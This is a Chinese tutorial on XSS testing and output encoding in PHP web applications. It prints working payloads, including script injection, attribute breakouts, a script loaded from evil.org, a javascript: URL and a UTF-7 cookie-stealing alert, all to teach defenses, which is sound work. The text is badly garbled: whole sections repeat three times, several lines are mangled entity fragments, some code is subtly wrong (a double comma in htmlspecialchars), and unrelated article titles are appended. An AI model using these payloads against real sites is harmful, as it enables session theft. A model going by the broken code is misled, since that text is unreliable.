对 WEB 应用进行 XSS 漏洞测试,不能仅仅局限于在 WEB 页面输入 XSS 攻击字段,然后提交。绕过 JavaScript 的检测,输入 XSS 脚本,通常被测试人员忽略。下图为 XSS 恶意输入绕过 JavaScript 检

  对 WEB 应用进行 XSS 漏洞测试,不能仅仅局限于在 WEB 页面输入 XSS 攻击字段,然后提交。绕过 JavaScript 的检测,输入 XSS 脚本,通常被测试人员忽略。下图为 XSS 恶意输入绕过 JavaScript 检测的攻击路径。

  常见的 XSS 输入

  XSS 输入通常包含 JavaScript 脚本,如弹出恶意警告框:<script>alert("XSS");</script>

  XSS 输入也可能是 HTML 代码段,譬如:

  网页不停地刷新 <meta http-equiv="refresh" content="0;">

  嵌入其它网站的链接 <iframe src=http://xxxx width=250 height=250></iframe>

  XSS (Cross Site Scripting) Cheat Sheet 维护了一份常见的 XSS 攻击脚本列表,可用来作为检测 WEB 应用是否存在 XSS 漏洞的测试用例输入。初次接触 XSS 攻击的开发人员可能会对列表提供的一些 XSS 输入不是很理解,本文第二部分将会针对不同代码上下文的 XSS 输入作进一步的解释。

  测试工具

  很多工具可以在浏览器发送 Get/Post 请求前将其截取,攻击者可以修改请求中的数据,从而绕过 JavaScript 的检验将恶意数据注入服务器。以下是一些常用的截取 HTTP 请求的工具列表。

Paros proxy (http://www.parosproxy.org)
Fiddler (http://www.fiddlertool.com/fiddler)
Burp proxy (http://www.portswigger.net/proxy/)
TamperIE (http://www.bayden.com/dl/TamperIESetup.exe)

  笔者曾经使用 TamperIE 对 WEB 应用进行安全性测试。TamperIE 小巧易用,能够截取 IE 浏览器发送的 Get/Post 请求,甚至能绕过 SSL 加密。不过 TamperIE + IE7 工作不稳定。IE7 提供了对 IPV6 的支持,如果你并不计划测试你的 Web 应用对 IPV6 的支持,建议还是使用 TamperIE + IE6 的组合。

  如图2所示: TamperIE 绕过客户端浏览器 JavaScript 的校验,在 POST 请求提交时将其截取,用户可以任意修改表单输入项 name 和 message 的值,譬如将 message 的值修改为 "<script>alert(“XSS hole!!”);</script>",然后点击 ”Send altered data” 按钮,将修改后的恶意数据发送给 Web 服务器。

  图 2. 使用 TamperIE 截取 Post 请求

  在输出端对动态内容进行编码

  对一个 Web 应用而言,其动态内容可能来源于用户输入、后台数据库、硬件状态改变或是网络信息等。动态内容特别是来自用户输入的动态内容很有可能包含恶意数据,从而影响网页的正常显示或是执行恶意脚本。将动态内容安全地显示在浏览器端与动态内容所处的上下文背景有关,譬如动态内容处在 HTML 正文、表单元素的属性、或是 JavaScript 代码段中。对于一个基于 PHP 语言的 Web 应用,当执行"echo"、"print"、"printf"、"<?=" 等语句时表示正在处理动态内容。本节将首先介绍 PHP 提供的库函数 htmlspecialchars()的用法,此函数能将 5 个 HTML 特殊字符转化为可在网页显示的 HTML 实体编码;然后将介绍一些常见背景下的 XSS 攻击输入,以及如何在输出端对动态内容进行转义、编码从而避免 XSS 攻击。

  使用 PHP 的 htmlspecialchars() 显示 HTML 特殊字符

  从上文列举的 XSS 恶意输入可以看到,这些输入中包含了一些特殊的 HTML 字符如 "<"、">"。当传送到客户端浏览器显示时,浏览器会解释执行这些 HTML 或JavaScript 代码而不是直接显示这些字符串。< > & “ 等字符在HTML语言中有特殊含义,对于用户输入的特殊字符,如何直接显示在网页中而不是被浏览器当作特殊字符进行解析?

  HTML字符实体由 & 符号、实体名字或者 # 加上实体编号、分号三部分组成。以下为 HTML 中一些特殊字符的编码。有的字符实体只有实体编号,没有对应的实体名字,譬如单引号。

  PHP 提供了htmlspecialchars()函数可以将 HTML 特殊字符转化成在网页上显示的字符实体编码。这样即使用户输入了各种 HTML 标记,在读回到浏览器时,会直接显示这些 HTML 标记,而不是解释执行。htmlspecialchars()函数可以将以下五种 HTML 特殊字符转成字符实体编码:

amp; 转成 amp;amp; 转成 amp;quot;lt; 转成 amp;lt;gt; 转成 amp;gt; 转成 amp;#39; 当直接调用 htmlspecialchars($str)时, 被转义。 当设置 ENT_QUOTES 标记时, 即调用htmlspecialch
&amp; 转成 &amp;amp;
“ 转成 &amp;quot;
&lt; 转成 &amp;lt;
&gt; 转成 &amp;gt;
‘ 转成 &amp;#39;

  当直接调用 htmlspecialchars($str)时, & " < > 被转义。

  当设置 ENT_QUOTES 标记时, 即调用htmlspecialchars($str, ENT_QUOTES)时,单引号也被转义。

  当设置 ENT_NOQUOTES 标记时,单引号和双引号都不会被转义。即调用 htmlspecialchars($str, ENT_NOQUOTES)时,只有& < > 被转义。

  不同背景下的动态内容的 XSS 攻击及解决方案

  XSS 攻击输入与动态内容所处的代码背景相关,譬如动态内容为表单元素属性的值、位于 HTML 正文、或是 Javascript 代码段中等等。

  HTML标记的属性为动态内容

  Web 应用中,"input"、"style"、"color" 等 HTML 标记的属性都可能为动态内容,其中"input" 标记的 "value" 属性通常为动态内容。

  例子1

&lt;form…&gt;&lt;INPUT type=text name="msg" id="msg" size=10 maxlength=8 value="&lt;?= $msg?&gt;"&gt;&lt;/form&gt;

  攻击XSS输入

Hello"&gt;&lt;script&gt;evil_script()&lt;/script&gt;

  将动态内容替换

  将 $msg 替换为恶意 XSS 输入:

&lt;form…&gt;&lt;INPUT type=text name="msg" id="msg" size=10 maxlength=8
value="Hello"&gt;&lt;script&gt;evil_script()&lt;/script&gt;"&gt;&lt;/form&gt;

  例子2

&lt;form…&gt;&lt;INPUT type=text name="msg" id="msg" size=10 maxlength=8 value=&lt;?= $msg?&gt;&gt;&lt;/form&gt;

  攻击 XSS 输入

Hello οnmοuseοver=evil_script()

  将动态内容替换

  将 $msg 替换为恶意 XSS 输入:

&lt;form…&gt;&lt;INPUT type=text name="msg" id="msg" size=10 maxlength=8
value=Hello οnmοuseοver=evil_script()&gt;&lt;/form&gt;

  分析

  从例子 1 可以看到其 XSS攻击输入中包含了 HTML 特殊字符 < > "

  从例子 2 可以看到其 XSS 攻击输入中没有包含上节中提到的五种 HTML 字符, 但是 "value"属性值没有使用双引号包围。

  解决方案

  调用htmlspecialchars($str, ENT_QUOTES)将以下 5 种 HTML 特殊字符 < > &‘ “ 转义;同时使属性值被双引号包围。譬如:

&lt;form…&gt;&lt;INPUT type=text name="msg" id="msg" size=10 maxlength=8
value="&lt;?= htmlspecialchars($msg, ENT_QUOTES))?&gt;"&gt;&lt;/form&gt;

  注意事项

  将 input 的 value 进行转义,必须考虑显示和存储数据的一致性问题,即显示在浏览器端和存储在服务器端后台的数据可能因为转义而变得不一致。譬如存储在服务器端的后台原始数据包含了以上 5 种特殊字符,但是没有转义,为了防止 XSS 攻击,在浏览器端输出时对 HTML 特殊字符进行了转义:

1. 当再度将表单提交时,存储的内容将会变成转义后的值。 2. 当使用 JavaScript 操作表单元素,需要使用到表单元素的值时,必须考虑到值可能已经被转义

  1. 当再度将表单提交时,存储的内容将会变成转义后的值。

  2. 当使用 JavaScript 操作表单元素,需要使用到表单元素的值时,必须考虑到值可能已经被转义。

  HTML文本为动态内容

  例子

&lt;b&gt; 欢迎:&lt;?= $welcome_msg?&gt;&lt;/b&gt;
攻击XSS输入
&lt;script&gt;evil_script()&lt;/script&gt;
将动态内容替换
将$welcome_msg 替换为恶意 XSS 输入:
&lt;b&gt;欢迎:&lt;script&gt;evil_script()&lt;/script&gt;&lt;/b&gt;

  分析

  在 HTML 正文背景下,< > 字符会引入 HTML 标记,& 可能会认为字符实体编码的开始,所以需要将 < > & 转义

  解决方案

  为简洁起见,直接使用 htmlspecialchars()将 5 种 HTML 特殊字符转义,如:

&lt;b&gt;欢迎:&lt;?= htmlspecialchars($welcome_msg,, ENT_NOQUOTES)?&gt;&lt;/b&gt;

  URL的值为动态内容

  Script/Style/Img/ActiveX/Applet/Frameset… 等标记的 src 或 href 属性如果为动态内容,必须确保这些 URL 没有指向恶意链接。

  例子1

&lt;script src=&lt;?= "$script_url&gt;"&gt;
攻击XSS输入
http://evil.org/evil.js
将动态内容替换
将$script_url替换为恶意 XSS 输入:
&lt;script src="http://evil.org/evil.js"&gt;

  例子2

&lt;img src=”&lt;?= $img_url&gt;”&gt;
攻击XSS输入
javascript:evil_script()
将动态内容替换
将$img_url替换为恶意XSS输入:
&lt;img src=” javascript:evil_script()”&gt;

  分析

  一般情况下尽量不要让 URL 的值被用户控制。如果用户需要自己定义自己的风格及显示效果,也不能让用户直接控制整个 URL 的内容,而是提供预定义好的风格供用户设置、装配,然后由后台程序根据用户的选择组合成安全的 URL 输出。

  字符集编码

  浏览器需要知道字符集编码才能正确地显示网页。如果字符集编码没有显式在 content-type 或meta 中定义,浏览器会有算法猜测网页的字符集编码。譬如<script>alert(document.cookie)</script> 的 UTF-7 编码为:

+ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-

  如果+ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-作为动态内容位于网页的顶端并传送到浏览器端,IE 会认为此网页是 UTF-7 编码,从而使网页不能正常显示。

  解决方案

  显式定义网页的字符集编码,譬如

&lt;meta http-equiv=content-type content="text/html; charset=UTF-8"&gt;

  动态内容为JavaScript事件处理函数的参数

  JavaScript 事件处理函数如 onClick/onLoad/onError/onMouseOver/ 的参数可能包含动态内容。

  例子

&lt;input type="button" value="go to" onClick='goto_url("&lt;?= $target_url&gt;");'&gt;
攻击XSS输入
foo&amp;quot;);evil_script(&amp;quot;
将动态内容替换
HTML 解析器会先于 JavaScript 解析器解析网页,将$target_url 替换为恶意 XSS 输入:
&lt;input type="button" value="go to" onClick='goto_url("foo");evil_script("");'&gt;
动态内容位于 JavaScript 代码段中
例子 lt;SCRIPT language=javascript1.2gt; var msg=lt;?= $welcome_msg?gt; ; // lt;/SCRIPTgt;攻击XSS输入1Hello; evil_script(); //将动态内容替换将 $welcome_msg 替换为恶意 XSS 输入:lt;

  例子

&lt;SCRIPT language="javascript1.2"&gt; var msg='&lt;?= $welcome_msg?&gt; '; // … &lt;/SCRIPT&gt;
攻击XSS输入1
Hello'; evil_script(); //
将动态内容替换
将 $welcome_msg 替换为恶意 XSS 输入:
&lt;SCRIPT language="javascript1.2"&gt; var msg='Hello'; evil_script(); //'; // … &lt;/SCRIPT&gt;
攻击XSS输入2
Hello&lt;/script&gt;&lt;script&gt;evil_script();&lt;/script&gt;&lt;script&gt;
将动态内容替换
将$welcome_msg 替换为恶意 XSS 输入:
&lt;script&gt; var msg = 'Hello&lt;/script&gt; &lt;script&gt;evil_script();&lt;/script&gt; &lt;script&gt;'// ... // do something with msg_text &lt;/script&gt;

  分析

  如上文所示,在 JavaScript 背景中使用动态内容需要非常谨慎。一般情况下,尽量避免或减少在 Javascript 的背景下使用动态内容,如果必须使用动态内容,在开发或代码审计时必须考虑这些动态内容可能的取值,是否会导致 XSS 攻击。

  建立PHP库函数校验输入

  Web 开发人员必须了解,仅仅在客户端使用 JavaScript 函数对非法输入进行检测过滤对于构建安全的 WEB 应用是不够的。如上文所述,攻击者可以轻易地借助工具绕过 JavaScript 校验甚至 SSL 加密输入恶意数据。在输出端对动态内容进行编码也只能起到一种双重保护的作用,更重要的应该在服务器端对输入进行校验。PHP 提供了strpos()、strstr()、preg_match()等函数可用于检测非法字符和字符串;preg_replace() 函数可用于替换非法字符串。OWASP PHP Filters 开源项目提供了一些 PHP 库函数用于过滤非法输入可作为参考。一些常见的检测和过滤包括:

  输入是否仅仅包含合法的字符;

  输入如果为数字,数字是否在指定的范围;

  输入字符串是否超过最大长度限制;

  输入是否符合特殊的格式要求,譬如email 地址、IP 地址;

  不同的输入框在逻辑上存在的耦合和限制的关系;

  除去输入首尾的空格;

  总结

  Web 应用的安全性是一个很重要、覆盖范围很广泛的主题。为了防止常见的 XSS 的攻击,Web 开发人员必须明白不能仅仅只在客户端使用 JavaScript 对输入进行检测、过滤;同时还应建立服务器端的输入校验、输出编码库函数;在服务器端检测、过滤输入;根据动态内容所处的背景将特殊字符进行编码后再传送给浏览器端显示。

例子 lt;SCRIPT language=javascript1.2gt; var msg=lt;?= $welcome_msg?gt; ; // lt;/SCRIPTgt;攻击XSS输入1Hello; evil_script(); //将动态内容替换将 $welcome_msg 替换为恶意 XSS 输入:lt;

  例子

&lt;SCRIPT language="javascript1.2"&gt; var msg='&lt;?= $welcome_msg?&gt; '; // … &lt;/SCRIPT&gt;
攻击XSS输入1
Hello'; evil_script(); //
将动态内容替换
将 $welcome_msg 替换为恶意 XSS 输入:
&lt;SCRIPT language="javascript1.2"&gt; var msg='Hello'; evil_script(); //'; // … &lt;/SCRIPT&gt;
攻击XSS输入2
Hello&lt;/script&gt;&lt;script&gt;evil_script();&lt;/script&gt;&lt;script&gt;
将动态内容替换
将$welcome_msg 替换为恶意 XSS 输入:
&lt;script&gt; var msg = 'Hello&lt;/script&gt; &lt;script&gt;evil_script();&lt;/script&gt; &lt;script&gt;'// ... // do something with msg_text &lt;/script&gt;

  分析

  如上文所示,在 JavaScript 背景中使用动态内容需要非常谨慎。一般情况下,尽量避免或减少在 Javascript 的背景下使用动态内容,如果必须使用动态内容,在开发或代码审计时必须考虑这些动态内容可能的取值,是否会导致 XSS 攻击。

  建立PHP库函数校验输入

  Web 开发人员必须了解,仅仅在客户端使用 JavaScript 函数对非法输入进行检测过滤对于构建安全的 WEB 应用是不够的。如上文所述,攻击者可以轻易地借助工具绕过 JavaScript 校验甚至 SSL 加密输入恶意数据。在输出端对动态内容进行编码也只能起到一种双重保护的作用,更重要的应该在服务器端对输入进行校验。PHP 提供了strpos()、strstr()、preg_match()等函数可用于检测非法字符和字符串;preg_replace() 函数可用于替换非法字符串。OWASP PHP Filters 开源项目提供了一些 PHP 库函数用于过滤非法输入可作为参考。一些常见的检测和过滤包括:

  输入是否仅仅包含合法的字符;

  输入如果为数字,数字是否在指定的范围;

  输入字符串是否超过最大长度限制;

  输入是否符合特殊的格式要求,譬如email 地址、IP 地址;

  不同的输入框在逻辑上存在的耦合和限制的关系;

  除去输入首尾的空格;

  总结

  Web 应用的安全性是一个很重要、覆盖范围很广泛的主题。为了防止常见的 XSS 的攻击,Web 开发人员必须明白不能仅仅只在客户端使用 JavaScript 对输入进行检测、过滤;同时还应建立服务器端的输入校验、输出编码库函数;在服务器端检测、过滤输入;根据动态内容所处的背景将特殊字符进行编码后再传送给浏览器端显示。

例子 lt;SCRIPT language=javascript1.2gt; var msg=lt;?= $welcome_msg?gt; ; // lt;/SCRIPTgt;攻击XSS输入1Hello; evil_script(); //将动态内容替换将 $welcome_msg 替换为恶意 XSS 输入:lt;

  例子

&lt;SCRIPT language="javascript1.2"&gt; var msg='&lt;?= $welcome_msg?&gt; '; // … &lt;/SCRIPT&gt;
攻击XSS输入1
Hello'; evil_script(); //
将动态内容替换
将 $welcome_msg 替换为恶意 XSS 输入:
&lt;SCRIPT language="javascript1.2"&gt; var msg='Hello'; evil_script(); //'; // … &lt;/SCRIPT&gt;
攻击XSS输入2
Hello&lt;/script&gt;&lt;script&gt;evil_script();&lt;/script&gt;&lt;script&gt;
将动态内容替换
将$welcome_msg 替换为恶意 XSS 输入:
&lt;script&gt; var msg = 'Hello&lt;/script&gt; &lt;script&gt;evil_script();&lt;/script&gt; &lt;script&gt;'// ... // do something with msg_text &lt;/script&gt;

  分析

  如上文所示,在 JavaScript 背景中使用动态内容需要非常谨慎。一般情况下,尽量避免或减少在 Javascript 的背景下使用动态内容,如果必须使用动态内容,在开发或代码审计时必须考虑这些动态内容可能的取值,是否会导致 XSS 攻击。

  建立PHP库函数校验输入

  Web 开发人员必须了解,仅仅在客户端使用 JavaScript 函数对非法输入进行检测过滤对于构建安全的 WEB 应用是不够的。如上文所述,攻击者可以轻易地借助工具绕过 JavaScript 校验甚至 SSL 加密输入恶意数据。在输出端对动态内容进行编码也只能起到一种双重保护的作用,更重要的应该在服务器端对输入进行校验。PHP 提供了strpos()、strstr()、preg_match()等函数可用于检测非法字符和字符串;preg_replace() 函数可用于替换非法字符串。OWASP PHP Filters 开源项目提供了一些 PHP 库函数用于过滤非法输入可作为参考。一些常见的检测和过滤包括:

  输入是否仅仅包含合法的字符;

  输入如果为数字,数字是否在指定的范围;

  输入字符串是否超过最大长度限制;

  输入是否符合特殊的格式要求,譬如email 地址、IP 地址;

  不同的输入框在逻辑上存在的耦合和限制的关系;

  除去输入首尾的空格;

  总结

  Web 应用的安全性是一个很重要、覆盖范围很广泛的主题。为了防止常见的 XSS 的攻击,Web 开发人员必须明白不能仅仅只在客户端使用 JavaScript 对输入进行检测、过滤;同时还应建立服务器端的输入校验、输出编码库函数;在服务器端检测、过滤输入;根据动态内容所处的背景将特殊字符进行编码后再传送给浏览器端显示。

原文转自: http://www.uml.org.cn/Test/201407161.asp

Web应用进行XSS漏洞测试相关推荐

  1. 回顾几个常见的XSS漏洞测试脚本

    回顾几个常见的XSS漏洞测试脚本 基础的测试: <script>alert('xss')</script> 如果过滤了指定标签 比如:<script>标签 < ...

  2. WEB安全:XSS漏洞与SQL注入漏洞介绍及解决方案

    对web安全方面的知识非常薄弱,这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,希望大家多多提意见. 对于防止sql注入发生,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避 ...

  3. Web安全之XSS漏洞

    同源策略 同源策略(Same-Origin Policy),就是为了保证互联网之中,各类资源的安全性而诞生的产物,它实际上是一个众多浏览器厂商共同遵守的约定.同源策略是浏览器中最基本的安全功能.缺少同 ...

  4. 浅析新浪微博Web蠕虫事件 XSS漏洞

    6月28日晚间20时左右,新浪出现了一次比较大的XSS(跨站脚本)漏洞***,"中毒"的微博用户会自动向自己的粉丝发送诸如"建党大业中穿帮的地方"." ...

  5. DOYO网站xss漏洞测试

    一.寻找xss漏洞 一般想获取最高权限,就要找存储型xss漏洞,这样的漏洞是服务器和浏览器进行数据交换的,有利于数据写入进去.一般留言板.评论区可能性最大. 1.评论区 <script>a ...

  6. OWASP出品:Xenotix XSS漏洞测试框架及简单使用

    OWASP Xenotix XSS Exploit Framework是一个高效的跨站脚本漏洞(XSS)检测和攻击测试框架.它通过特有的三大浏览器引擎(包括Trident, WebKit和Gecko) ...

  7. pikachu之xss漏洞学习

    1简介 XSS是一种发生在Web前端的漏洞,所以其危害的对象也主要是前端用户 XSS漏洞可以用来进行钓鱼攻击.前端js挖矿.盗取用户cookie,甚至对主机进行远程控制 攻击流程# 假设存在漏洞的是一 ...

  8. 基于网络爬虫的XSS漏洞检测技术

    1. 背景和意义 在早期的网站设计中,网页的存在形式都是静态的.静态的网页内容稳定,不会经常更新,但是在后期却不易维护.如果需要维护更新网页,则必须重新编辑HTML网页,因此当网站很庞大的时候,维护静 ...

  9. XSS Reflected 测试

    前言 由于最近在做XSS方面的测试,于是找到了DVWA平台进行实验测试,通过这三篇文章让大家了解XSS方面的大概内容,这三篇文章只是把你领进XSS的大门,要想真正深入的学习XSS,你还需要去学习很多东 ...

最新文章

  1. 异常检测算法--Isolation Forest
  2. 软件测试周记录之jmeter
  3. [Bug]The maximum array length quota (16384) has been exceeded while reading XML data.
  4. Matlab编程学习笔记【待续】
  5. 计算机课设容易挂吗,数学差的学生避开这4大专业,挂科是常态,每年都有学生不能毕业...
  6. 微信生态圈盈­利模式分析
  7. 计算机二级office函数日期,Excel函数-日期和文本函数-计算机二级Office
  8. JavaWeb进度报告1
  9. uploadify 实现文件上传
  10. python编程符号大全-python符号大全
  11. 中国移动CMPP短信开发平台通讯包 2.8
  12. 英语语法笔记——基础语法(一)
  13. 华为机试:VLAN资源池
  14. 写学位论文Word操作技巧:奇偶页眉不同,页码连续
  15. [FirefoxOS_开发]Firefox OS Quick Start
  16. Direction Change
  17. 支撑起腾讯公司计费业务的TDSQL
  18. 外媒曝光:小米新奇想专利让超广角拍摄不失真
  19. BKEX Global研究院最新市场信息解读
  20. apple pay 技术_如何在手机上设置Apple Pay和Google电子钱包

热门文章

  1. 消息中间件学习总结(21)——RocketMQ 消息丢失场景分析及如何解决!
  2. Nginx学习总结(13)——Nginx 重要知识点回顾
  3. Nginx学习总结(12)——Nginx各项配置总结
  4. Kotlin学习总结(1)——Kotlin快速入门
  5. Docker学习总结(2)——Docker实战之入门以及Dockerfile(二)
  6. c语言迷宫求解毕业设计,毕业设计(论文)-基于Windows平台C语言实现迷宫游戏的设计.doc...
  7. django 坑~~
  8. Apache Pulsar的多租户消息系统
  9. 5G标准化加速 需应对测试场景复杂性
  10. Aruba 云服务代金券